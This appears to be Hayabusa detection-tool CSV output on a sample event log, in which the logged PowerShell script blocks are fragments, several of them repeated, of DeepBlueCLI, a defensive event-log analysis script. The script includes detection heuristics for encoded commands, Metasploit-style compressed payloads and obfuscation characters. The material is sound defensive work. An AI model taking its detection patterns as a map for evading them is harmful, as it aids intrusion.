.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" 
{$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { #",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:47:01.705 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:47:01.705 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"$text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. 
Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:47:01.705 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"$text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. 
# I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:47:01.708 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. 
$groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. 
$servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ # The path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:47:01.714 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:47:01.717 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" 
{$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 16:47:15.018 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" 